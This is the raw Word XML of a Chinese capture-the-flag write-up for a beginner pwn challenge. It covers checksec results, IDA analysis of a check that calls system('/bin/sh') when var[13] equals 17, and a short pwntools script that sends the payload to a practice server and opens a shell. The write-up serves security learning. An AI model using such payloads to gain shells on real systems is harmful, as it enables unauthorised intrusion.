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0B734" w14:textId="2CC54BFD" w:rsidR="004612F7" w:rsidRDefault="004612F7" w:rsidP="004612F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先checksec和file一下文件，得到信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ECA6909" wp14:editId="47383300">
            <wp:extent cx="5270500" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="532013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8238E" w14:textId="77777777" w:rsidR="004612F7" w:rsidRDefault="004612F7" w:rsidP="004612F7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>32位文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D8CED6" w14:textId="77777777" w:rsidR="004612F7" w:rsidRDefault="004612F7" w:rsidP="004612F7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NX：启用了NX保护，栈堆不可执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5883AFD2" w14:textId="1A4C11FD" w:rsidR="004612F7" w:rsidRDefault="004612F7" w:rsidP="004612F7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PIE：意味着程序每次运行时内存地址不固定，攻击者不易确定关键代码和数据位置来构造攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFD0173" w14:textId="77777777" w:rsidR="004612F7" w:rsidRDefault="004612F7" w:rsidP="004612F7">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>STACK CANARY：启用栈金丝雀保护，攻击者不可直接使用栈溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674F838" w14:textId="53510DA2" w:rsidR="004612F7" w:rsidRDefault="004612F7" w:rsidP="004612F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放入ida逆向一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2674363A" w14:textId="68BB33E1" w:rsidR="004612F7" w:rsidRDefault="004612F7" w:rsidP="004612F7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E22FAD" w14:textId="6A813B0D" w:rsidR="004612F7" w:rsidRDefault="004612F7" w:rsidP="004612F7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004612F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AC35748" wp14:editId="138A4C72">
            <wp:extent cx="5274310" cy="5360670"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="988667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67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0E2D" w14:textId="446441FA" w:rsidR="004612F7" w:rsidRDefault="004612F7" w:rsidP="004612F7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到信息</w:t>
      </w:r>
      <w:r w:rsidR="00D1289B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这题几乎保护全开了，但分析一下函数只需要var[13]=17就可以</w:t>
      </w:r>
      <w:r w:rsidR="001B17AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这道题的难点在于函数看不懂特别是这一部分看不懂直接下线：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3345121C" w14:textId="77777777" w:rsidR="001B17AB" w:rsidRDefault="001B17AB" w:rsidP="001B17AB">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if ( *(_QWORD *)&amp;var[13] ) {          // 检查 var[13] 开始的8字节是否非零</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD4939C" w14:textId="77777777" w:rsidR="001B17AB" w:rsidRDefault="001B17AB" w:rsidP="001B17AB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 xml:space="preserve">    if ( *(_QWORD *)&amp;var[13] == 17LL ) // 检查这8字节是否等于17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252FC6E7" w14:textId="77777777" w:rsidR="001B17AB" w:rsidRDefault="001B17AB" w:rsidP="001B17AB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system("/bin/sh");            // 条件满足时启动shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5352E0D2" w14:textId="34EE4FE1" w:rsidR="001B17AB" w:rsidRDefault="001B17AB" w:rsidP="001B17AB">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538FE41F" w14:textId="22179390" w:rsidR="001B17AB" w:rsidRDefault="001B17AB" w:rsidP="001B17AB">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B17AB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D84BF1F" wp14:editId="3FEF179E">
            <wp:extent cx="5274310" cy="2235835"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="225898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98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1B36" w14:textId="025F259F" w:rsidR="001B17AB" w:rsidRDefault="001B17AB" w:rsidP="001B17AB">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个数组是int不是char，int是四个字节，从0到12得13*4，</w:t>
      </w:r>
      <w:r w:rsidR="00B664EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个函数强制将32转为64位，相当于把数组13和14看成一个数据让他等于64位的17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2971F7D0" w14:textId="7114D4E4" w:rsidR="00A845FC" w:rsidRDefault="00A845FC" w:rsidP="001B17AB">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[注意]：这道题并没有改变栈内数据而是scanf正常输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C807FF0" w14:textId="182B142E" w:rsidR="005767AF" w:rsidRDefault="005767AF" w:rsidP="001B17AB">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击脚本为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DEB538" w14:textId="77777777" w:rsidR="005767AF" w:rsidRDefault="005767AF" w:rsidP="005767AF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DB0B06" w14:textId="77777777" w:rsidR="005767AF" w:rsidRDefault="005767AF" w:rsidP="005767AF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3242AB50" w14:textId="77777777" w:rsidR="005767AF" w:rsidRDefault="005767AF" w:rsidP="005767AF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># 填充前52字节（var[0]~var[12]）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B2F680" w14:textId="77777777" w:rsidR="005767AF" w:rsidRDefault="005767AF" w:rsidP="005767A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payload = b'A' * 52  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A76F8E" w14:textId="77777777" w:rsidR="005767AF" w:rsidRDefault="005767AF" w:rsidP="005767AF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># 写入 var[13] = 17, var[14] = 0（共8字节）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406F795F" w14:textId="77777777" w:rsidR="005767AF" w:rsidRDefault="005767AF" w:rsidP="005767AF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload += p64(17)    # p64 自动处理小端序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9002BD" w14:textId="77777777" w:rsidR="005767AF" w:rsidRDefault="005767AF" w:rsidP="005767AF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C5BC3E" w14:textId="77777777" w:rsidR="005767AF" w:rsidRDefault="005767AF" w:rsidP="005767AF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># 发送payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D3571D" w14:textId="77777777" w:rsidR="005767AF" w:rsidRDefault="005767AF" w:rsidP="005767AF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sh = remote("node5.buuoj.cn", 26870)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C1BD0A" w14:textId="77777777" w:rsidR="005767AF" w:rsidRDefault="005767AF" w:rsidP="005767AF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sh.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AEA8B4" w14:textId="577E09BD" w:rsidR="005767AF" w:rsidRDefault="005767AF" w:rsidP="005767AF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sh.interactive()  # 获取shell</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005767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329FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83C82B06"/>
    <w:lvl w:ilvl="0" w:tplc="2000030E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94062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2F7"/>
    <w:rsid w:val="000E66E0"/>
    <w:rsid w:val="001B17AB"/>
    <w:rsid w:val="004612F7"/>
    <w:rsid w:val="005767AF"/>
    <w:rsid w:val="007F7C0D"/>
    <w:rsid w:val="00A743B3"/>
    <w:rsid w:val="00A845FC"/>
    <w:rsid w:val="00B664EF"/>
    <w:rsid w:val="00D1289B"/>
    <w:rsid w:val="00F3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44D666"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F2C418E9-48CF-488C-B81A-8B7817FB6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12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1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12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12F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12F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12F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12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12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12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12F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1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1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12F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12F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12F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12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12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12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12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1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12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12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1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12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12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12F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1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12F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12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270</Words>
  <Characters>472</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>24</Lines>
  <Paragraphs>27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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-31T15:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-01T03:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>